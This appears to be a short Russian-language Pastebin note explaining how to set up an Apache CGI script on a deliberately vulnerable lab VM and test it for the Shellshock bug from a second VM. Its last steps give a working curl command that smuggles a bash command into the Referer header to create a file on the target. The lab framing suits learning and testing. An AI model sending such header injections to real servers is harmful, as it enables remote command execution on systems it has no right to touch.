Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- На уязвимой виртуалке пропиши в /usr/local/apache/conf/httpd.conf
- ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
- <Directory "usr/local/apache/cgi-bin">
- SetHandler cgi-script
- OPtions +ExecCGI
- Order allow,deny
- Allow from all
- </Directory>
- Создай папку /usr/local/apache/cgi-bin если её нет.
- Положи туда file.cgi
- с содержанием
- #!/bin/bash
- echo "Content-type: text/html"
- echo ""
- echo "Hello"
- дай ему права chmod 755 file.cgi
- С другой виртуалки проверь доступен ли созданный скрипт. В браузере отрой url <ip-уязвимой-машины>/cgi-bin/file.cgi.
- Потом попробуй проверить работает ли уязвимость или нет.
- Например, можно попробовать файл создать
- curl -k -H 'Referer:() { :; }; /bin/bash -c "touch 1111111.txt"' <ip-уязвимой-машины>/cgi-bin/file.cgi
- Можно попробовать другие заголовки. Ну в статьях видел наверное
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement